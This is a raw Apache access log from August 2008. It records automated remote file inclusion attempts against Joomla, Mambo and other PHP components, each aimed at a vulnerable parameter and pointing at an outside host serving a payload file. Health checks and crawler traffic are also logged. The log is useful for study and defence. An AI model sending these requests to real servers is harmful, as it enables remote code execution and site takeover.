85.17.6.7 - - [30/Aug/2008:00:17:21 -0400] "GET /logs//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tripi-ddl.com/video/mraneti.txt? HTTP/1.1" 404 386 "-" "libwww-perl/5.79"
221.130.201.43 - - [30/Aug/2008:00:17:26 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
221.130.201.43 - - [30/Aug/2008:00:17:28 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:17:37 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:17:37 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/Aug/2008:00:17:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.101.4.49 - - [30/Aug/2008:00:17:46 -0400] "GET /logs/access_log.Q108081100/adminfoot.php?path[docroot]=http://www.comehackus.com/backup/idfx.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:17:58 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:18:07 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:18:08 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:18:09 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:18:18 -0400] "GET /logs/access_log.Q108081300//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:18:31 -0400] "GET /logs/access_log.Q108051700/inc/cmses/aedatingCMS.php?dir[inc]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:18:37 -0400] "GET /logs/error_log.Q108061600/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:18:37 -0400] "GET /index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:18:42 -0400] "GET /logs/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:18:42 -0400] "GET /logs/access_log.Q108081900/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:18:43 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:18:48 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:18:51 -0400] "GET /logs/error_log.Q108051800//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
75.127.70.16 - - [30/Aug/2008:00:19:08 -0400] "GET /logs/access_log.Q108082300//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 408 "-" "libwww-perl/5.811"
221.130.201.43 - - [30/Aug/2008:00:19:11 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
193.26.13.170 - - [30/Aug/2008:00:19:12 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:19:12 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
221.130.201.43 - - [30/Aug/2008:00:19:13 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
221.130.201.43 - - [30/Aug/2008:00:19:14 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
193.26.13.170 - - [30/Aug/2008:00:19:18 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:19:24 -0400] "GET /logs/error_log.Q108032300//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:28 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:29 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:40 -0400] "GET /logs/error_log.Q108062900//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:41 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:42 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:19:43 -0400] "GET /logs/error_log.Q108072800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
85.17.6.7 - - [30/Aug/2008:00:19:45 -0400] "GET /logs/access_log.Q108082300//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 408 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:19:55 -0400] "GET /logs/access_log.Q108082300//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tripi-ddl.com/video/mraneti.txt? HTTP/1.1" 404 408 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:19:57 -0400] "GET /logs/error_log.Q108041200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
211.96.69.149 - - [30/Aug/2008:00:20:17 -0400] "GET /logs/access_log.Q108082300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.villaconsuls.com/xbox/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
84.21.71.133 - - [30/Aug/2008:00:20:21 -0400] "GET /logs/error_log.Q108042500//admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
211.96.69.149 - - [30/Aug/2008:00:20:21 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.villaconsuls.com/xbox/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
211.96.69.149 - - [30/Aug/2008:00:20:21 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.villaconsuls.com/xbox/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
84.21.71.133 - - [30/Aug/2008:00:20:21 -0400] "GET //admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:20:21 -0400] "GET /logs/error_log.Q108050400//admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:20:22 -0400] "GET /logs//admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
211.96.69.149 - - [30/Aug/2008:00:20:22 -0400] "GET /logs/error_log.Q108052000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.villaconsuls.com/xbox/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
200.53.114.42 - - [30/Aug/2008:00:20:24 -0400] "GET /logs/error_log.Q108062900//PhpLinkExchange/bits_listings.php?svr_rootP=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:20:28 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:20:28 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:20:32 -0400] "GET /logs/error_log.Q108072800//PhpLinkExchange/bits_listings.php?svr_rootP=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:20:41 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:20:48 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:20:49 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:20:49 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:21:00 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:21:07 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:21:15 -0400] "GET /logs/error_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:21:16 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:21:21 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:21:23 -0400] "GET /logs/access_log.Q108081900/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:21:23 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:21:24 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
221.130.201.43 - - [30/Aug/2008:00:22:02 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.53.114.42 - - [30/Aug/2008:00:22:13 -0400] "GET /logs/error_log.Q108061400//phpsecurityadmin/include/logout.php?PSA_PATH=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:22:16 -0400] "GET /logs/access_log.Q108071600//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:22:23 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.76"
209.59.12.99 - - [30/Aug/2008:00:22:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:23:09 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.76"
200.68.35.77 - - [30/Aug/2008:00:23:42 -0400] "GET /logs/error_log.Q108053000/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:23:42 -0400] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:23:42 -0400] "GET /logs/error_log.Q108053000/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:23:43 -0400] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:23:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:23:43 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
200.53.114.42 - - [30/Aug/2008:00:24:28 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:24:29 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
221.130.201.43 - - [30/Aug/2008:00:25:50 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
74.6.8.96 - - [30/Aug/2008:00:26:09 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.96 - - [30/Aug/2008:00:26:09 -0400] "GET /logs/access_log.Q108052400 HTTP/1.0" 200 1309393 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.96 - - [30/Aug/2008:00:26:32 -0400] "GET /logs/access_log.Q108080300 HTTP/1.0" 200 334452 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.26.13.170 - - [30/Aug/2008:00:27:31 -0400] "GET /logs/error_log.Q108060200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:27:31 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:27:31 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
209.59.12.99 - - [30/Aug/2008:00:27:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:28:02 -0400] "GET /logs/error_log.Q108022400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:28:06 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:28:06 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:28:06 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:28:07 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
69.146.185.122 - - [30/Aug/2008:00:28:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:30 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:30 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:30 -0400] "GET /Includes HTTP/1.1" 301 247 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:31 -0400] "GET /images HTTP/1.1" 301 245 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:31 -0400] "GET /logs HTTP/1.1" 301 243 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:35 -0400] "GET /scripts HTTP/1.1" 301 246 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:35 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:35 -0400] "GET /logs/access_log.Q106121400 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:36 -0400] "GET /logs/access_log.Q106121500 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:36 -0400] "GET /logs/access_log.Q106121600 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:36 -0400] "GET /logs/access_log.Q106121700 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:36 -0400] "GET /logs/access_log.Q106121800 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:36 -0400] "GET /logs/access_log.Q106121900 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122000 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122100 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122200 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122300 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122400 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122500 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:37 -0400] "GET /logs/access_log.Q106122600 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q106122700 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q106122800 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q106122900 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q106123000 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q106123100 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q107010100 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:38 -0400] "GET /logs/access_log.Q107010200 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:39 -0400] "GET /logs/access_log.Q107010300 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
69.146.185.122 - - [30/Aug/2008:00:28:39 -0400] "GET /logs/access_log.Q107010400 HTTP/1.1" 404 224 "-" "Java/1.6.0_05"
193.26.13.170 - - [30/Aug/2008:00:29:14 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:30:13 -0400] "GET /logs/access_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:30:14 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:30:14 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:31:44 -0400] "GET /logs/error_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:32:35 -0400] "GET /logs/error_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
209.59.12.99 - - [30/Aug/2008:00:32:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.26.13.170 - - [30/Aug/2008:00:32:49 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:32:49 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:33:12 -0400] "GET /logs/access_log.Q108081700/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:33:29 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
200.68.35.77 - - [30/Aug/2008:00:33:53 -0400] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:33:56 -0400] "GET /logs/access_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
163.19.117.1 - - [30/Aug/2008:00:34:08 -0400] "GET ///include.php?path[docroot]=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
163.19.117.1 - - [30/Aug/2008:00:34:08 -0400] "GET /logs///include.php?path[docroot]=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
